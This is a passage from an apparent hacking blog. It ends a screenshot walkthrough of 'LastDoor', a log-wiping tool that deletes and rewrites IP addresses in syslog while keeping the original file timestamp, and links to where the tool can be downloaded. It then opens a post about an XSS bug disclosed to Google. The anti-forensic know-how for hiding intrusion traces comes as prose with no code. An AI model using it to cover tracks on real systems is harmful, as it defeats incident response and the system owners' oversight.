<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMiHQ1Hiipa_JCUnu7i11M4MMWm1o0AUl3ImxBwV63Md6yHmRVDBrrzdDvGHJQPjg98JYMZ3Oa3csohVlkbeVzhBKP2gJ2oErSrjIYA3bb2hV6cNpioiI77h4cCyWeZeJzpIkAaGKfgIG/s1600/functions5x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeMiHQ1Hiipa_JCUnu7i11M4MMWm1o0AUl3ImxBwV63Md6yHmRVDBrrzdDvGHJQPjg98JYMZ3Oa3csohVlkbeVzhBKP2gJ2oErSrjIYA3bb2hV6cNpioiI77h4cCyWeZeJzpIkAaGKfgIG/s1600/functions5x.jpg" /></a></div>
<br />
Following the on-screen prompt, we enter the second ip, the same directory depth of 3, and this time we are finished, so enter 'no' to more search/replace jobs.<br />
<br />
Notice that there is a final prompt for the number of seconds before executing. I enter 5 which gives adequate time to logout and close the shell [the process would then run as a background daemon] (However, this is not necessary unless for example you wanted to make sure your bash history is updated to delete previous commands like "./LastDoor", or you wanted to make sure your ip isn't recorded on logout).<br />
<br />
For demonstration purposes I don't exit the shell, and am able to view the progress of the search from the shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj34G8QkY2rswLhbfLz01ROHOmDtqM63hUvKJf_m8bV6K9ikF1cDP0ezuYYlUC5SNSFqIIf5qCWmfMVTd6J50Ug3UFceDn917pnF3AFK9Lbon6Pczy0MrIEz1ATXLWa-QWbRZw_zofMR-eV/s1600/functions6x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj34G8QkY2rswLhbfLz01ROHOmDtqM63hUvKJf_m8bV6K9ikF1cDP0ezuYYlUC5SNSFqIIf5qCWmfMVTd6J50Ug3UFceDn917pnF3AFK9Lbon6Pczy0MrIEz1ATXLWa-QWbRZw_zofMR-eV/s1600/functions6x.jpg" /></a></div>
<br />
Once the process completes, I cat syslog to check that the changes were made. As per the overlay images show below, the line where the first ip was found was deleted, and the second ip, formally 123.456.789.123 was changed to 111.111.111.111, as requested.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMXUUl03SvgoaJuRhvWvmqGhNRmy1qYFcuFUXzm3uSpxJ6iSat626iy9JmiNfmgSm5biyoL9XJ-NRqeGCkYkxYWLccj28pYIHVm1c5366F7XnqTrUUt7fCyhK6tliLAYCknXCMIPPfz7s/s1600/finishedz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIMXUUl03SvgoaJuRhvWvmqGhNRmy1qYFcuFUXzm3uSpxJ6iSat626iy9JmiNfmgSm5biyoL9XJ-NRqeGCkYkxYWLccj28pYIHVm1c5366F7XnqTrUUt7fCyhK6tliLAYCknXCMIPPfz7s/s1600/finishedz.jpg" /></a></div>
<br />
Finally, we want to check that the file date modified has not been changed as this might arise suspicion. Running "ls -l": the image below shows that the log cleaner has maintained the original file modified date which was "2012-12-13 23:54" hurra!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IhmEp-CrtHVefPI_Z623IGv22O7rOWxzEfMEguYFSn18Cbo7_92_dF7zTtADGAYbet07zgmJcS6J_gCzdBAn2WyNBS1P_AyTvHOpw970H4cPd_vJ_JaaKXw_Lw18ULHRd8PDDd5fBVbm/s1600/functions8x.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IhmEp-CrtHVefPI_Z623IGv22O7rOWxzEfMEguYFSn18Cbo7_92_dF7zTtADGAYbet07zgmJcS6J_gCzdBAn2WyNBS1P_AyTvHOpw970H4cPd_vJ_JaaKXw_Lw18ULHRd8PDDd5fBVbm/s1600/functions8x.jpg" /></a></div>
<br />
<a href="http://packetstormsecurity.org/files/118922/Last-Door-Log-Wiper.html" target="_blank">Download (Archive: LastDoor, LastDoor.c, README)</a> from Packetstormsecurity.org<br />
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span> <br />
<br />
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-63097784303763271662012-03-01T12:46:00.000-08:002013-05-09T20:58:28.049-07:00XSS find in Google.com - on the hall of fame at last!<div style="text-align: justify;">
<div style="text-align: center;">
<br /></div>
</div>
<div style="text-align: justify;">
<br />
<u>March update:</u><br />
<br />
Google updated their wall of fame for Jan-March (http://www.google.co.uk/about/appsecurity/hall-of-fame/reward/). I disclosed a cross site scripting (XSS) vulnerability last month, and Google were kind enough to put me on their wall (and give me a few pennies to spend at the sweet shop). <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Qkv8s.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/Qkv8s.jpg" /></a></div>
<br /></div>
Unknownnoreply@blogger.com0